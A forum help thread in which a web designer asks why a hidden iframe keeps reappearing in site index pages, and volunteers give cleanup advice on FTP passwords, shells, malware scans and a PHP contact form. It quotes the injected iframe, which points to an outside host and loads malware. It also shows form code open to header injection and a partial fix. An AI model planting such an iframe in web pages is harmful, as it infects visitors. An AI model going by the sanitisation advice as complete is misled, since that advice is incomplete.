Very Frustrated...Websites Compromised

[#41baby]

Hello,

I have been having problems with several websites I design/maintain.  We thought the issue was dealt with 3 months ago but it keeps coming back.  The following appears in any page named INDEX:

Code: [Select]

<iframe src="h[i]tt[/i]p://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
It causes a virus to be downloaded.

I have done everything the internet has suggested:  malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday).  I woke up this morning and the sites were again nailed with the virus.

I read on this list, it could have something to do with PHP code.  Could it be my form code?  I have one PHP and one that is flash with PHP that I got off the net.

If anyone here can help me out, that would be greatly appreciated.

After I get my password change (and I removed the FTP program's storage of the information), what should I do?

Thanks,

DN

MysteryFCM: Embedded HTML in BBCode tags

[MysteryFCM]

Theres 4 main things you need to do;

1. Check your sites files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site

This should ALL be done from a known clean machine (i.e. not the machine you usually use).

If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.

If your site uses a database, this will need to be checked aswell.

[#41baby]

Hello,

Thanks for the reply.

Questions from your answers:

1. Check your sites files (ALL of the files) for malicious code:  the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.    

2. Check no shells were uploaded:  I have no idea what you mean by this.  Can you tell me how to check for "shells".

3. Change the FTP passwords:  In the works.

4. Change any web based passwords for the site:  I do have any.

5.  This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups:  This is always the part I get really confused.  The website files from my computer are always clean.  They get infected once I put them online.  I have checked them many times and they are clean.  So, I just have to burn them to a disk, bring them to say, my lap-top (which I never used for uploading to the server before) and upload them?

6. If your site uses a database:  I just have a basic package from www.namesecure.com.  Not sure if it has a database.  I do not think so.

Thanks for your answers and I look forward to clarifying what you already said.

DN

[CM_MWR]

These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.

[#41baby]

Hello,

These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.

Two (more) Questions:

1 - Any suggestions for checking my computer.  I have done SEVERAL different scans and methods.  Any suggestions would be appreciated.  Perhaps I missed something.   

2 - In terms of using another computer to upload:  so I can never use my actually computer again?  What if I need to change something on my website?  My lap-top does not have the programs. 

Thanks,

DN

[MysteryFCM]

Shells allow the attacker to compromise the site, even after the passwords are changed, as they can then do whatever they want via an HTTP interface. You can identify these by going through the files on the server, and deleting any that shouldn't be there (you can identify what shouldn't be there by checking your backups)

You can use your usual machine again, once you're sure it's clean. Without knowing which programs you've already tried, I can only suggest programs to use;

a-Squared
www.emsisoft.com

Malwarebytes AntiMalware
www.malwarebytes.org

ClamWin
www.clamwin.com

Kaspersky
www.kaspersky.com

the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.

If you've not changed the FTP password yet, it won't matter how many times you replace the files, especially if this is how they got in - it will keep happening until the FTP password is changed (this should've been the first thing to have been done)

[MysteryFCM]

As an aside, if you would like help verifying your machine is clean, please see the following;

http://temerc.com/forums/viewtopic.php?f=12&t=18

[#41baby]

Hello,

Thanks.

I will get my changed passwords hopefully on Monday.

I will then go through everything you have suggested.

I appreciate the help and will post again if it comes up again.

DN

[MysteryFCM]

No problem ..... if you require further help, please do not hesitate to pop back

[#41baby]

Hello,

I do have one more question.  I have noticed during my investigations on these viruses that it could be the PHP code of forms.  I have also noticed that one "under construction" site I have, the virus acted different.  That site got nailed with the virus but does NOT have the PHP form code, the virus is there in the code but does not activate.

Below is the code for my FLASH/PHP form.

I was wondering if there might be something that could be improved.

Thanks,

DN

---

Code: [Select]

<?php
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];

if( $contact_name == true )
{
$sender = $contact_email;
$receiver = "MY EMAIL ADDRESS";
$client_ip = $_SERVER['REMOTE_ADDR'];
$email_body = "Name: $contact_name \nEmail: $sender \nSubject: $contact_subject \nMessage: $contact_message \nIP: $client_ip";
$extra = "From: $sender\r\n" . "Reply-To: $sender \r\n" . "X-Mailer: PHP/" . phpversion();

if( mail( $receiver, "Flash Contact Form - $subject", $email_body, $extra ) ) 
{
echo "success=yes";
}
else
{
echo "success=no";
}
}
?>
MysteryFCM: Embedded code in BBCode tags

[MysteryFCM]

Change;

Code: [Select]

$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];

if( $contact_name == true )

To;

Code: [Select]

$contact_name = $_POST['name']; $contact_name=stripslashes(htmlspecialchars($contact_name, ENT_QUOTES));
$contact_email = $_POST['email']; if(strpos($contact_email, "@")==false){die('E-mail invalid');}
$contact_email = stripslashes(htmlspecialchars($contact_email, ENT_QUOTES));
$contact_subject = $_POST['subject']; $contact_subject=stripslashes(htmlspecialchars($contact_subject, ENT_QUOTES));
$contact_message = $_POST['message']; $contact_message=stripslashes(htmlspecialchars($contact_message, ENT_QUOTES));

if(isset($_POST['email']) && isset($_POST['message']))

[MysteryFCM]

I also wrote a spambot filter that you may want to consider adding to your forms;

http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

There's a vanilla PHP mod at;

http://forum.hosts-file.net/viewtopic.php?f=69&t=1597

[#41baby]

Hello,

I cannot express how much I appreciate this.

Should I change it and upload AFTER the new passwords are in place?

I was thinking, I could delete the entire website and upload my backups after I do a double check of my computer.  I know none of web pages on my computer are effected.  Still, the virus could be on my computer.  I will get it checked using ALL the methods you mentioned above.

Thanks,

DN

[MysteryFCM]

If you've got a backup, even better. This will save you having to identify shells and manually remove malicious code. However, this should only be done AFTER;

1. FTP passwords are changed
2. Your machine is confirmed as clean (unless of course, you do this from a secondary machine known to be clean)
3. ALL files currently on your sites FTP server are deleted

Again, I must stress, if this is done before the passwords are changed and before the machine is confirmed as clean, there is nothing preventing this happening again.

[#41baby]

Hello,

I checked my website's server and I do not see any files I do not recognize.  Every file that is on the server, that is on my computer is clean. 

I will follow your instructions to the letter.

Thank you,

Derek